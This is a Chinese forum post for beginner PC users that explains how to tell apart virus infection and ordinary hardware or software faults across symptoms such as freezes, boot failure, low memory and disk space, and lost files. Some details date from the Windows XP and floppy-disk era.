笔者的电脑经常出现死机、运行速度慢等异常情况,使用了多种杀毒软件也不见效,如何判断电脑异常是否是病毒在作怪?这样的例子并不少见,特别是对于一些初级电脑用户。下面笔者结合个人使用电脑及网络维护方面的防毒经验从以下几个方面给大家介绍:如何辨别电脑是否中了病毒,希望对你能识别:“真毒”有一定帮助。

病毒与软、硬件故障的区别和联系

电脑出现故障不只是因为感染病毒才会发生,个人电脑使用过程中出现各种故障现象多是因为电脑本身的软、硬件故障引起的,网络上的多是由于权限设置所致。我们只有充分地了解两者的区别与联系,才能作出正确的判断,在真正病毒来了之时才会及时发现。

死机现象:病毒打开了许多文件或占用了大量内存;运行不稳定(如内存质量差,硬件超频性能差等);运行了大容量的软件占用了大量的内存和磁盘空间;使用了一些测试软件(有许多Bug);硬盘空间不够等等;运行网络上的软件时经常死机也许是由于网络速度太慢,所运行的程序太大,或者自己的工作站硬件配置太低。

系统无法启动:病毒修改了硬盘的引导信息,或者删除了某些启动文件。如引导型病毒引导文件损坏;硬盘损坏或参数设置不正确;系统文件人为地误删除等。

文件打不开:病毒修改了文件格式;病毒修改了文件链接位置。文件损坏或硬盘损坏;文件快捷方式对应的链接位置发生了变化;原来编辑文件的软件删除了;如果是在局域网中多表现为服务器中文件存放位置发生了变化,而工作站没有及时刷新服务器的内容(长时间打开了资源管理器)。

经常报告内存不够:病毒非法占用了大量内存;打开了大量的软件;运行了需要大量内存资源的软件;系统配置不正确;内存容量太小等(目前基本内存要求为128MB)。

提示硬盘空间不够:病毒复制了大量的病毒文件(这种现象比较常见,有时好端端的近40GB硬盘安装了一个Windows 2000操作系统或Windows XP操作系统就说没空间了,安装软件时就提示硬盘空间不够)。硬盘每个分区容量太小;安装了大量的大容量软件;所有软件都集中安装在一个分区之中;硬盘本身就小;如果是在局域网中系统管理员为每个用户设置了工作站用户的“私人盘”使用空间限制,因查看的是整个网络盘的大小,其实“私人盘”上容量已用完了。

软盘等设备未访问时出读写信号:病毒感染,软盘取走了还在打开曾经在软盘中打开过的文件。

出现大量来历不明的文件:病毒复制文件;可能是一些软件安装中产生的临时文件;也或许是一些软件的配置信息及运行记录。

数据丢失:病毒删除了文件;硬盘扇区损坏;因恢复文件而覆盖原文件;如果是在网络上的文件,也可能是由于其他用户误删除了。

回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

关于我们|小黑屋|手机版|Archiver|站内搜索|惠安学生网 ( 闽ICP备2021016123号 )

GMT+8, 2025-6-7 15:12 , Processed in 0.065451 second(s), 14 queries .

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表